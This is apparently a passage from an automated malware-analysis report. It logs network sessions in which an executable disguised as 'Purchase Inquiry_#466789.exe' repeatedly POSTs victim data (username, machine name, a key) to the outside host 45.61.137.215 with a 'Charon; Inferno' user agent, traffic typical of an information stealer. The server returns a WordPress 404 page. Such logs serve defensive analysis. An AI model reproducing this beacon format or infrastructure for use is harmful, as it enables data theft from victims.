                  Content-Key: A316C5D8
                  Content-Length: 149
                  Connection: close
                  May 27, 2024 08:32:41.229871035 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 37 00 35 00 30 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones675052JONES-PC0FDD42EE188E931437F4FBE2C
                  May 27, 2024 08:32:43.330020905 CEST1236INHTTP/1.0 404 Not Found
                  Date: Mon, 27 May 2024 06:32:41 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                  May 27, 2024 08:32:43.330095053 CEST224INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                  Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
                  May 27, 2024 08:32:43.330244064 CEST1236INData Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30
                  Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
                  May 27, 2024 08:32:43.330296040 CEST1236INData Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f
                  Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
                  May 27, 2024 08:32:43.330379009 CEST1236INData Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d
                  Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
                  May 27, 2024 08:32:43.330410957 CEST672INData Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30
                  Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
                  May 27, 2024 08:32:43.330445051 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                  Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                  May 27, 2024 08:32:43.330475092 CEST224INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                  Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
                  May 27, 2024 08:32:43.330521107 CEST1236INData Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73
                  Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
                  May 27, 2024 08:32:43.330554008 CEST224INData Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63
                  Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  16192.168.2.44975945.61.137.215807244C:\Users\user\Desktop\Purchase Inquiry_#466789.exe
                  TimestampBytes transferredDirectionData
                  May 27, 2024 08:32:43.490499020 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.137.215
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: A316C5D8
                  Content-Length: 149
                  Connection: close
                  May 27, 2024 08:32:43.495484114 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 37 00 35 00 30 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones675052JONES-PC0FDD42EE188E931437F4FBE2C
                  May 27, 2024 08:32:45.589375973 CEST1236INHTTP/1.0 404 Not Found
                  Date: Mon, 27 May 2024 06:32:44 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                  May 27, 2024 08:32:45.589411020 CEST224INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                  Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
                  May 27, 2024 08:32:45.589467049 CEST1236INData Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30
                  Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
                  May 27, 2024 08:32:45.589519024 CEST1236INData Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f
                  Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
                  May 27, 2024 08:32:45.589553118 CEST1236INData Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d
                  Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
                  May 27, 2024 08:32:45.589586973 CEST672INData Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30
                  Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
                  May 27, 2024 08:32:45.589622974 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                  Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                  May 27, 2024 08:32:45.589658022 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                  Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                  May 27, 2024 08:32:45.589690924 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                  Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                  May 27, 2024 08:32:45.589726925 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                  Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  17192.168.2.44976045.61.137.215807244C:\Users\user\Desktop\Purchase Inquiry_#466789.exe
                  TimestampBytes transferredDirectionData
                  May 27, 2024 08:32:45.756036043 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.137.215
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: A316C5D8
                  Content-Length: 149
                  Connection: close
                  May 27, 2024 08:32:45.761205912 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 37 00 35 00 30 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones675052JONES-PC0FDD42EE188E931437F4FBE2C
                  May 27, 2024 08:32:47.884399891 CEST1236INHTTP/1.0 404 Not Found
                  Date: Mon, 27 May 2024 06:32:46 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                  May 27, 2024 08:32:47.884454012 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                  Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                  May 27, 2024 08:32:47.884505033 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                  Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                  May 27, 2024 08:32:47.884536028 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                  Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                  May 27, 2024 08:32:47.884567976 CEST1236INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                  Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                  May 27, 2024 08:32:47.884618044 CEST1236INData Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29
                  Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
                  May 27, 2024 08:32:47.884650946 CEST1236INData Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61
                  Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
                  May 27, 2024 08:32:47.884680033 CEST108INData Raw: 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f
                  Data Ascii: white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-
                  May 27, 2024 08:32:47.884712934 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                  Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
